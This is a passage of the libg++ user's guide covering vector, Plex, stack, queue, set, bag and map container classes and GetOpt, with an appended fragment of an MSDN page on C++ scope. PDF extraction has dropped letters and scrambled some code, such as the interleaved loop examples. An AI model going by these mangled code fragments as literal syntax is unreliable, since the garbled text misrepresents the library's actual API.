operations, as well as backward traversal via Pixes. x = a.remove_rear(); a.del_rear(); deletes and returns the item stored at the rear of the list. deletes the last element, without returning it. inserts x before the i. deletes the item at the current position, then advances forward if dir is positive, else backward. a.ins_before(Pix i, x) a.del(Pix& iint dir = 1) Chapter 28: Vector classes 89 28 Vector classes The les `g++-include/Vec.ccP' and `g++-include/AVec.ccP' provide pseudo-generic standard array-based vector operations. The corresponding header les. 28.1 Constructors and assignment intVec a; declares a to be an empty vector. Its size may be changed via resize. declares a to be an uninitialized vector of ten elements (numbered 0-9). declares b to be a vector of six elements, all initialized to zero. Any value can be used as the initial ll argument. Copies b to a. a is resized to be the same as b. intVec a(10); intVec b(6, 0); a = b; a = b.at(2, 4) constructs a from the 4 elements of b starting at b[2]. Assume declarations of intVec a, b, c and int i, x in the following. 28.2 Status and access a.capacity(); returns the number of elements that can be held in a. sets a's length to 20. All elements are unchanged, except that if the new size is smaller than the original, than trailing elements are deleted, and if greater, trailing elements are uninitialized. returns a reference to the i'th element of a, or produces an error if i is out of range. returns a reference to the i'th element of a. Unlike the [] operator, i is not checked to ensure that it is within range. returns true if a and b contain the same elements in the same order. is the converse of a == b. a.resize(20); a[i]; a.elem(i) a == b; a != b; 90 User's Guide to the GNU C++ Class Library 28.3 Constructive operations c = concat(a, b); c = map(f, a); sets c to the new vector constructed from all of the elements of a followed by all of b. sets c to the new vector constructed by applying int function f(int) to each element of a. sets c to the new vector constructed by merging the elements of ordered vectors a and b using ordering (comparison) function f. sets c to the new vector constructed by applying int function f(int, int) to successive pairs of a and b. The result has length the shorter of a and b. sets c to a, with elements in reverse order. c = merge(a, b, f); c = combine(f, a, b); c = reverse(a) 28.4 Destructive operations a.reverse(); a.sort(f) reverses a in-place. sorts a in-place using comparison function f. The sorting method is a variation of the quicksort functions supplied with GNU emacs. lls the 2 elements starting at a[4] with zero. a.fill(0, 4, 2) 28.5 Other operations a.apply(f) applies function f to each element in a. accumulates the results of applying function f to successive elements of a starting with base. returns the index of the leftmost occurrence of the target, or -1, if it does not occur. invokes the error handler. The default version prints the error message, then aborts. x = a.reduce(f, base) a.index(int targ); a.error(char* msg) Chapter 28: Vector classes 91 28.6 AVec operations. AVecs provide additional arithmetic operations. All vector-by-vector operators generate an error if the vectors are not the same length. The following operations are provided, for AVecs a, b and base element (scalar) s. a = b; Copies b to a. a and b must be the same size. a = s; lls all elements of a with the value s. a is not resized. a + s; a - s; a * s; a / s adds, subtracts, multiplies, or divides each element of a with the scalar. a += s; a -= s; a *= s; a /= s; adds, subtracts, multiplies, or divides the scalar into a. adds, subtracts, multiplies, or divides corresponding elements of a and b. adds, subtracts, multiplies, or divides corresponding elements of b into a. returns the inner (dot) product of a and b. returns the sum of elements of a. returns the sum of squared elements of a. returns the minimum element of a. returns the maximum element of a. returns the index of the minimum element of a. a + b; a - b; product(a, b), quotient(a, b) a += b; a -= b; a.product(b); a.quotient(b); s = a * b; x = a.sum(); x = a.sumsq(); x = a.min(); x = a.max(); i = a.min_index(); i = a.max_index(); returns the index of the maximum element of a. Note that it is possible to apply vector versions other arithmetic operators via the mapping functions. For example, to set vector b to the cosines of doubleVec a, use b = map(cos, a);. This is often more ecient than performing the operations in an element-by-element fashion. 92 User's Guide to the GNU C++ Class Library Chapter 29: Plex classes 93 29 Plex classes A \Plex" is a kind of array with the following properties: Plexes may have arbitrary upper and lower index bounds. For example a Plex may be declared to run from indices -10 .. 10. Plexes may be dynamically expanded at both the lower and upper bounds of the array in steps of one element. Only elements that have been specically initialized or added may be accessed. Elements may be accessed via indices. Indices are always checked for validity at run time. Plexes may be traversed via simple variations of standard array indexing loops. Plex elements may be accessed and traversed via Pixes. Plex-to-Plex assignment and related operations on entire Plexes are supported. Plex classes contain methods to help programmers check the validity of indexing and pointer operations. Plexes form \natural" base classes for many restricted-access data structures relying on logically contiguous indices, such as array-based stacks and queues. Plexes are implemented as pseudo-generic classes, and must be generated via the genclass utility. ecient code. Plexes are implemented as a linked list of IChunks. Each chunk contains a part of the array. Chunk sizes may be specied within Plex constructors. Default versions also exist, that use a #define'd default. Plexes grow by lling eects. Plexes may be indexed and used like arrays, although traversal syntax is slightly die for for for (int (int (Pix (Pix i i t t = = = = p.low(); i < p.fence(); p.next(i)) use(p[i]); p.high(); i > p.ecnef(); p.prev(i)) use(p[i]); p.first(); t != 0; p.next(t)) use(p(i));. 94 User's Guide to the GNU C++ Class Library; Declares p to be an initially zero-sized Plex with low index of zero, and the default chunk size. For FPlexes, chunk sizes represent maximum sizes. Plex p(int size); Declares p to be an initially zero-sized Plex with low index of zero, and the indicated chunk size. If size is negative, then the Plex is created with free space at the beginning of the Plex, allowing more ecient add low() operations. Otherwise, it leaves space at the end. Declares p to be an initially zero-sized Plex with low index of low, and the indicated chunk size. Declares p to be a Plex with indices from low to high, initially lled with initval, and the indicated chunk size if specied, else the default or (high - low + 1), whichever is greater. Declares q to be a copy of p. Copies Plex q into p, deleting its previous contents. Returns the number of elements in the Plex. Returns true if Plex p contains no elements. Returns true if Plex p cannot be expanded. This always returns false for XPlexes and MPlexes. Returns a reference to the i'th element of p. An exception (error) occurs if i is not a valid index. Returns true if i is a valid index into Plex p. Return the minimum (maximum) valid index of the Plex, or the high (low) fence if the plex is empty. Plex p(int low, int size); Plex p(int low, int high, Base initval, int size = 0); Plex q(p); p = q; p.length() p.empty() p.full() p[i] p.valid(i) p.low(); p.high(); Chapter 29: Plex classes 95 p.ecnef(); p.fence(); Return the index one position past the minimum (maximum) valid index. Set i to the next (previous) index. This index may not be within bounds. returns a reference to the item at Pix pix. Return the minimum (maximum) valid Pix of the Plex, or 0 if the plex is empty. set pix to the next (previous) Pix, or 0 if there is none. Returns true if the Plex contains the element associated with pix. If pix is a valid Pix to an element of the Plex, returns its corresponding index, else raises an exception. if i is a valid index, returns a the corresponding Pix. Return a reference to the element at the minimum (maximum) valid index. An exception occurs if the Plex is empty. Returns true if the plex can be extended one element downward (upward). These always return true for XPlex and MPlex. Extend the Plex by one element downward (upward). The new minimum (maximum) index is returned. Shrink the Plex by one element on the low (high) end. The new minimum (maximum) element is returned. An exception occurs if the Plex is empty. Append all of Plex q to the high side of p. Prepend all of q to the low side of p. Delete all elements, resetting p to a zero-sized Plex. Resets p to be indexed starting at low() = i. For example. if p were initially declared via Plex p(0, 10, 0), and then re-indexed via p.reset_low(5), it could then be indexed from indices 5 .. 14. sets all p[i] to x..fill(x) 96 User's Guide to the GNU C++ Class Library p.fill(x, lo, hi) p.reverse() sets all of p[i] from lo to hi, inclusive, to x. reverses p in-place. returns the chunk size used for the plex. p.chunk_size() p.error(const char * msg) calls the resettable error handler. MPlexes are plexes with bitmaps that allow items to be logically deleted and restored. They behave like other plexes, but also support the following additional and modied capabilities: p.del_index(i); p.del_Pix(pix) logically deletes p[i] (p(pix)). After deletion, attempts to access p[i] generate a error. Indexing via low(), high(), prev(), and next() skip the element. Deleting an element never changes the logical bounds of the plex. logically undeletes p[i] (p(pix)). p.undel_index(i); p.undel_Pix(pix) p.del_low(); p.del_high() Delete the lowest (highest) undeleted element, resetting the logical bounds of the plex to the next lowest (highest) undeleted index. Thus, MPlex del low() and del high() may shrink the bounds of the plex by more than one index. Resets the low and high bounds of the Plex to the indexes of the lowest and highest actual undeleted elements. Adds x in an unused index, if possible, else performs add high. p.adjust_bounds() int i = p.add(x) p.count() returns the number of valid (undeleted) elements. returns the number of available (deleted) indices. returns the index of some deleted element, if one exists, else triggers an error. An unused element may be reused via undel. returns the pix of some deleted element, if one exists, else 0. An unused element may be reused via undel. p.available() int i = p.unused_index() pix = p.unused_Pix() Chapter 30: Stacks 97 30 Stacks Stacks are declared as an \abstract" class. They are currently implemented in any of three ways. VStack implement xed sized stacks via arrays. XPStack implement dynamically-sized stacks via XPlexes. SLStack implement dynamically-size stacks via linked lists. All possess the same capabilities. They dier only in constructors. VStack constructors require a xed maximum capacity argument. XPStack constructors optionally take a chunk size argument. SLStack constructors take no argument. Assume the declaration of a base element x. Stack s; or Stack s(int capacity) declares a Stack. s.empty() s.full() returns true if stack s is empty. returns true if stack s is full. XPStacks and SLStacks never become full. returns the current number of elements in the stack. pushes x on stack s. pops and returns the top of stack returns a reference to the top of stack. pops, but does not return the top of stack. When large items are held on the stack it is often a good idea to use top() to inspect and use the top of stack, followed by a del_top() s.length() s.push(x) x = s.pop() s.top() s.del_top() s.clear() removes all elements from the stack. 98 User's Guide to the GNU C++ Class Library Chapter 31: Queues 99 31 Queues Queues are declared as an \abstract" class. They are currently implemented in any of three ways. VQueue implement xed sized Queues via arrays. XPQueue implement dynamically-sized Queues via XPlexes. SLQueue implement dynamically-size Queues via linked lists. All possess the same capabilities; they dier only in constructors. VQueue constructors require a xed maximum capacity argument. XPQueue constructors optionally take a chunk size argument. SLQueue constructors take no argument. Assume the declaration of a base element x. Queue q; or Queue q(int capacity); declares a queue. q.empty() q.full() returns true if queue q is empty. returns true if queue q is full. XPQueues and SLQueues are never full. returns the current number of elements in the queue. enqueues x on queue q. dequeues and returns the front of queue returns a reference to the front of queue. dequeues, but does not return the front of queue removes all elements from the queue. q.length() q.enq(x) x = q.deq() q.front() q.del_front() q.clear() 100 User's Guide to the GNU C++ Class Library Chapter 32: Double ended Queues 101 32 Double ended Queues Deques are declared as an \abstract" class. They are currently implemented in two ways. XPDeque implement dynamically-sized Deques via XPlexes. DLDeque implement dynamically-size Deques via linked lists. All possess the same capabilities. They dier only in constructors. XPDeque constructors optionally take a chunk size argument. DLDeque constructors take no argument. Double-ended queues support both stack-like and queue-like capabilities: Assume the declaration of a base element x. Deque d; or Deque d(int initial_capacity) declares a deque. d.empty() d.full() returns true if deque d is empty. returns true if deque d is full. Always returns false in current implementations. returns the current number of elements in the deque. inserts x at the rear of deque d. inserts x at the front of deque d. dequeues and returns the front of deque returns a reference to the front of deque. returns a reference to the rear of the deque. deletes, but does not return the front of deque deletes, but does not return the rear of the deque. removes all elements from the deque. d.length() d.enq(x) d.push(x) x = d.deq() d.front() d.rear() d.del_front() d.del_rear() d.clear() 102 User's Guide to the GNU C++ Class Library Chapter 33: Priority Queue class prototypes. 103 33 Priority Queue class prototypes. Priority queues maintain collections of objects arranged for fast access to the least element. Several prototype implementations of priority queues are supported. XPPQs implement 2-ary heaps via XPlexes. SplayPQs implement PQs via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of \simple top-down splaying" (described on page 669 of the article). The simple-splay mechanism for priority queue functions is loosely based on the one used by D. Jones in the C splay tree functions available from volume 14 of the uunet.uu.net archives. PHPQs implement pairing heaps (as described by Fredman and Sedgewick in Algorithmica, Vol 1, p111-129). Storage for heap elements is managed via an internal freelist technique. The constructor allows an initial capacity estimate for freelist space. The storage is automatically expanded if necessary to hold new items. The deletion technique is a fast \lazy deletion" strategy that marks items as deleted, without reclaiming space until the items come to the top of the heap. All PQ classes support the following operations, for some PQ class Heap, instance h, Pix ind, and base class variable x. h.empty() returns true if there are no elements in the PQ. returns the number of elements in h. Places x in the PQ, and returns its index. Dequeues the minimum element of the PQ into x, or generates an error if the PQ is empty. returns a reference to the minimum element. deletes the minimum element. deletes all elements from h; returns true if x is in h. returns a reference to the item indexed by ind. returns the Pix of rst item in the PQ or 0 if empty. This need not be the Pix of the least element. advances ind to the Pix of next element, or 0 if there are no more. h.length() ind = h.enq(x) x = h.deq() h.front() h.del_front() h.clear(); h.contains(x) h(ind) ind = h.first() h.next(ind) 104 User's Guide to the GNU C++ Class Library ind = h.seek(x) h.del(ind) Sets ind to the Pix of x, or 0 if x is not in h. deletes the item with Pix ind. Chapter 34: Set class prototypes 105 34 Set class prototypes Set classes maintain unbounded collections of items containing no, and [c] comparing (via ==, <=) and [m] merging (via |=, -=, &=) sets). XPSets implement unordered sets via XPlexes. ([a O(n)], [f O(n)], [d O(n)], [c O(n^2)] [m O(n^2)]). OXPSets implement ordered sets via XPlexes. ([a O(n)], [f O(log n)], [d O(n)], [c O(n)] [m O(n)]). SLSets implement unordered sets via linked lists ([a O(n)], [f O(n)], [d O(n)], [c O(n^2)] [m O(n^2)]). OSLSets implement ordered sets via linked lists ([a O(n)], [f O(n)], [d O(n)], [c O(n)] [m O(n)]). AVLSets implement ordered sets via threaded AVL trees ([a O(log n)], [f O(log n)], [d O(log n)], [c O(n)] [m O(n)]). BSTSets implement ordered sets via binary search trees. The trees may be manually rebalanced via the O(n) balance() member function. ([a O(log n)/O(n)], [f O(log n)/O(n)], [d O(log n)/O(n)], [c O(n)] [m O(n)]). SplaySets implement ordered sets via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of \simple top-down splaying" (described on page 669 of the article). (Amortized: [a O(log n)], [f O(log n)], [d O(log n)], [c O(n)] [m O(n log n)]). VHSets implement unordered sets via hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)], [c O(n)/O(n^2)] [m O(n)/O(n^2)]). VOHSets implement unordered sets via ordered hash tables The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)], [c O(n)/O(n^2)] [m O(n)/O(n^2)]). CHSets implement unordered sets via chained hash tables. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)], [c O(n)/O(n^2)] [m O(n)/O(n^2)]). The dierent implementations dier in whether their constructors require an argument specifying their initial capacity. Initial capacities are required for plex and hash table based Sets. If none is given DEFAULT_INITIAL_CAPACITY (from `<T>defs.h') is used. Sets support the following operations, for some class Set, instances a and b, Pix ind, and base element x. Since all implementations are virtual derived classes of the <T>Set class, it is possible to mix and match operations across dierent implementations, although, as usual, operations are generally faster when the particular classes are specied in functions operating on Sets. Pix-based operations are more fully described in the section on Pixes. See Chapter 9 [Pix], page 31 106 User's Guide to the GNU C++ Class Library Set a; or Set a(int initial_size); Declares a to be an empty Set. The second version is allowed in set classes that require initial capacity or sizing specications. returns true if a is empty. returns the number of elements in a. inserts x into a, returning its index. deletes x from a. deletes all elements from a; returns true if x is in a. returns a reference to the item indexed by ind. returns the Pix of rst item in the set or 0 if the Set is empty. For ordered Sets, this is the Pix of the least element. advances ind to the Pix of next element, or 0 if there are no more. Sets ind to the Pix of x, or 0 if x is not in a. returns true if a and b contain all the same elements. returns true if a and b do not contain all the same elements. returns true if a is a subset of b. Adds all elements of b to a. Deletes all elements of b from a. Deletes all elements of a not occurring in b. a.empty() a.length() Pix ind = a.add(x) a.del(x) a.clear() a.contains(x) a(ind) ind = a.first() a.next(ind) ind = a.seek(x) a == b a != b a <= b a |= b a -= b a &= b Chapter 35: Bag class prototypes 107 35 Bag class prototypes Bag classes maintain unbounded collections of items potentially containing). XPBags implement unordered Bags via XPlexes. ([a O(1)], [f O(n)], [d O(n)]). OXPBags implement ordered Bags via XPlexes. ([a O(n)], [f O(log n)], [d O(n)]). SLBags implement unordered Bags via linked lists ([a O(1)], [f O(n)], [d O(n)]). OSLBags implement ordered Bags via linked lists ([a O(n)], [f O(n)], [d O(n)]). SplayBags implement ordered Bags via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of \simple top-down splaying" (described on page 669 of the article). (Amortized: [a O(log n)], [f O(log n)], [d O(log n)]). VHBags implement unordered Bags via hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)]). CHBags implement unordered Bags via chained hash tables. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)]). The implementations dier in whether their constructors require an argument to specify their initial capacity. Initial capacities are required for plex and hash table based Bags. If none is given DEFAULT_INITIAL_CAPACITY (from `<T>defs.h') is used. Bags support the following operations, for some class Bag, instances a and b, Pix ind, and base element x. Since all implementations are virtual derived classes of the <T>Bag class, it is possible to mix and match operations across dierent implementations, although, as usual, operations are generally faster when the particular classes are specied in functions operating on Bags. Pix-based operations are more fully described in the section on Pixes. See Chapter 9 [Pix], page 31 Bag a; or Bag a(int initial_size) Declares a to be an empty Bag. The second version is allowed in Bag classes that require initial capacity or sizing specications. returns true if a is empty. returns the number of elements in a. inserts x into a, returning its index. deletes one occurrence of x from a. deletes all occurrences of x from a. a.empty() a.length() ind = a.add(x) a.del(x) a.remove(x) 108 User's Guide to the GNU C++ Class Library a.clear() deletes all elements from a; returns true if x is in a. returns the number of occurrences of x in a. returns a reference to the item indexed by ind. returns the Pix of rst item in the Bag or 0 if the Bag is empty. For ordered Bags, this is the Pix of the least element. advances ind to the Pix of next element, or 0 if there are no more. Sets ind to the Pix of the next occurrence x, or 0 if there are none. If from is 0, the rst occurrence is returned, else the following from. a.contains(x) a.nof(x) a(ind) int = a.first() a.next(ind) ind = a.seek(x. Pix from = 0) Chapter 36: Map Class Prototypes 109 36 Map Class Prototypes Maps support associative array operations (insertion, deletion, and membership of records based on an associated key). They require the specication of two types, the key type and the contents type. These are currently implemented in several ways, diering in representation strategy, algorithmic eciency, and appropriateness for various tasks. (Listed next to each are average (followed by worstcase, if dierent) time complexities for [a] accessing (via op [], contains), [d] deleting elements). AVLMaps implement ordered Maps via threaded AVL trees ([a O(log n)], [d O(log n)]). RAVLMaps Similar, but also maintain ranking information, used via ranktoPix(int r), that returns the Pix of the item at rank r, and rank(key) that returns the rank of the corresponding item. ([a O(log n)], [d O(log n)]). SplayMaps implement ordered Maps via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of \simple top-down splaying" (described on page 669 of the article). (Amortized: [a O(log n)], [d O(log n)]). VHMaps implement unordered Maps via hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [d O(1)/O(n)]). CHMaps implement unordered Maps via chained hash tables. ([a O(1)/O(n)], [d O(1)/O(n)]). The dierent implementations dier in whether their constructors require an argument specifying their initial capacity. Initial capacities are required for hash table based Maps. If none is given DEFAULT_INITIAL_CAPACITY (from `<T>defs.h') is used. All Map classes share the following operations (for some Map class, Map instance d, Pix ind and key variable k, and contents variable x). Pix-based operations are more fully described in the section on Pixes. See Chapter 9 [Pix], page 31 Map d(x); Map d(x, int initial_capacity) Declare d to be an empty Map. The required argument, x, species the default contents, i.e., the contents of an otherwise uninitialized location. The second version, specifying initial capacity is allowed for Maps with an initial capacity argument. returns true if d contains no items. returns the number of items in d. returns a reference to the contents of item with key k. If no such item exists, it is installed with the default contents. Thus d[k] = x installs x, and x = d[k] retrieves it. returns true if an item with key eld k exists in d. deletes the item with key k. deletes all items from the table. d.empty() d.length() d[k] d.contains(k) d.del(k) d.clear() 110 User's Guide to the GNU C++ Class Library x = d.dflt() returns the default contents. returns a reference to the key at Pix ind. returns a reference to the contents at Pix ind. returns the Pix of the rst element in d, or 0 if d is empty. advances ind to the next element, or 0 if there are no more. returns the Pix of element with key k, or 0 if k is not in d. k = d.key(ind) x = d.contents(ind) ind = d.first() d.next(ind) ind = d.seek(k) Chapter 37: C++ version of the GNU getopt function 111 37 C++ version of the GNU getopt function #include <stdio.h> #include <GetOpt.h> //... int debug_flag, compile_flag, size_in_bytes; The GetOpt class provides an ecient and structured mechanism for processing command-line options from an application program. The sample program fragment below illustrates a typical use of the GetOpt class for some hypothetical application program:ies: which requires extra overhead to pass the parameters for every call. Along with the GetOpt constructor and int operator ()(void), the other relevant elements of class GetOpt are: char *optarg while ((option_char = getopt (argc, argv, "dcs:")) != EOF) // ... } Used for communication from operator ()(void) to the caller. When operator ()(void) nds an option that takes an argument, the argument value is stored here. Index in argv of the next element to be scanned. This is used for communication to and from the caller and for communication between successive calls to operator ()(void). int optind 112 User's Guide to the GNU C++ Class Library When operator ()(void) returns EOF, this is the index of the rst of the non-option elements that the caller should itself scan. Otherwise, optind communicates from one call to the next how much of argv has been scanned so far. The libg++ version of GetOpt acts like standard UNIX getopt for the calling routine, but it behaves dierently exible argument order. Setting the environment variable POSIX OPTION ORDER disables permutation. Then the behavior is completely standard. Chapter 38: Projects and other things left to do 113 38 Projects and other things left to do 38.1 Coming Attractions Some things that will probably be available in libg++ in the near future: Revamped C-compatibility header les that will be compatible with the forthcoming (ANSIbased) GNU libc.a A revision of the File-based classes that will use the GNU stdio library, and also be 100% compatible (even at the streambuf level) with the AT&T 2.0 stream classes. Additional container class prototypes. generic Matrix class prototypes. A task package probably based on Dirk Grunwald's threads package. 38.2 Wish List Some things that people have mentioned that they would like to see in libg++, but for which there have not been any oers: A method to automatically convert or incorporate libg++ classes so they can be used directly in Gorlen's OOPS environment. A class browser. A better general exception-handling strategy. Better documentation. 38.3 How to contribute Programmers who have written C++ classes that they believe to be of general interest are encourage to write to dl at rocky.oswego.edu. Contributing code is not dicult. Here are some general guidelines: FSF must maintain the right to accept or reject potential contributions. Generally, the only reasons for rejecting contributions are cases where they duplicate existing or nearly-released code, contain unremovable specic machine dependencies, or are somehow incompatible with the rest of the library. Acceptance of contributions means that the code is accepted for adaptation into libg++. FSF must reserve the right to make various editorial changes in code. Very often, this merely entails formatting, maintenance of various conventions, etc. Contributors are always given authorship credit and shown the nal version for approval. Contributors must assign their copyright to FSF via a form sent out upon acceptance. Assigning copyright to FSF ensures that the code may be freely distributed. Assistance in providing documentation, test les, and debugging support is strongly encouraged. Extensions, comments, and suggested modications of existing libg++ features are also very welcome. 114 User's Guide to the GNU C++ Class Library i Table of Contents GNU LIBRARY GENERAL PUBLIC LICENSE Preamble . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 How to Apply These Terms to Your New Libraries . . . . . . . . . . . . . . . . . . . . . 8 ..................... ..... 1 Contributors to GNU C++ library 9 1 Installing GNU C++ library 11 2 Trouble in Installation 13 3 GNU C++ library aims, objectives, and limitations 15 4 GNU C++ library stylistic conventions 17 5 Support for representation invariants 19 6 Introduction to container class prototypes 21 ....................... ............................ ................................................... ............ ............. ....... 7 Variable-Sized Object Representation 27 8 Some guidelines for using expression-oriented classes 29 9 Pseudo-indexes 31 10 Header les for interfacing C++ to C 33 11 Utility functions for built in types 35 12 Library dynamic allocation primitives 37 13 The new input/output classes 39 14 The old I/O library 41 ............ ................................................... .................................... ............ ............... ........... ................... 6.1 Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 14.1 File-based classes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 14.2 Basic IO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 .............................. ii User's Guide to the GNU C++ Class Library 14.3 File Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 14.4 File Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 ................................ .............................. 15 The Obstack class 16 The AllocRing class 17 The String class 17.1 17.2 17.3 17.4 17.5 17.6 17.7 18 19 20 21 22 The Integer class. The Rational Class The Complex class. Fixed precision numbers Classes for Bit manipulation Constructors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Comparing, Searching and Matching . . . . . . . . . . . . . . . . . . . . . . . . . . . Substring extraction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Concatenation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Other manipulations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Reading, Writing and Conversion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ................................ .............................. .............................. ......................... ..................... .................................. 45 49 51 51 52 53 54 55 56 56 23 Random Number Generators and related classes ................................................... 22.1 BitSet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 22.2 BitString . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 23.1 23.2 23.3 23.4 23.5 23.6 23.7 23.8 23.9 23.10 23.11 23.12 23.13 23.14 23.15 23.16 RNG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ACG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . MLCG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Random . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Binomial . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Erlang . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Geometric . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . HyperGeometric . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . NegativeExpntl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Normal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . LogNormal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Poisson . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DiscreteUniform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Uniform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Weibull . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . RandomInteger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 63 65 67 69 75 75 75 76 76 76 77 77 77 77 77 77 77 78 78 78 78 24 Data Collection 25 Curses-based classes 26 List classes 26.1 26.2 26.3 26.4 26.5 26.6 24.1 SampleStatistic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 24.2 SampleHistogram . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 ............................. .................................. 79 81 83 iii 27 Linked Lists 28.1 28.2 28.3 28.4 28.5 28.6 Constructors and assignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 List status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 heads and tails . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Constructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Destructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 Other operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 ...................................... ....................................... 28 Vector classes 27.1 Doubly linked lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 .................................... 87 89 29 30 31 32 33 34 35 36 37 Plex classes Stacks Queues Double ended Queues Priority Queue class prototypes. Set class prototypes Bag class prototypes Map Class Prototypes C++ version of the GNU getopt function Constructors and assignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Status and access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Constructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Destructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Other operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 AVec operations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91 ...................................... ............................................ ........................................... .......................... ............... ............................ ............................ .......................... ....... 93 97 99 101 103 105 107 109 111 iv 38 Projects and other things left to do User's Guide to the GNU C++ Class Library ............ 38.1 Coming Attractions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 38.2 Wish List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 38.3 How to contribute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 113
https://www.scribd.com/document/3400539/User-s-Guide-to-the-GNU-C-Library
CC-MAIN-2017-51
refinedweb
22,117
66.44
C++: { int i; }: class Point { int x; int y; };: errno_t strcpy_s( char *strDestination, size_t numberOfElements, const char *strSource ); Names declared within a namespace block have namespace scope and can be accessed using the scope operator namespace::name. Example: namespace X { int t; } int const soXt(sizeof X::t); The same rule applies to names in class scope, with the additional restriction that nonstatic members must be attached to an object of class type as demonstrated below. Point p; int (&px)(p.Point::x); Instead of static Point p;static int size(List& l); static Point p; static int size(List& l); Use a namespace to get the same result: namespace{Point p;int size(List& l);} namespace{ namespace { Point p;int size(List& l); int size(List& l); }
http://msdn.microsoft.com/en-us/library/b7kfh662(VS.80).aspx
crawl-002
refinedweb
128
51.21
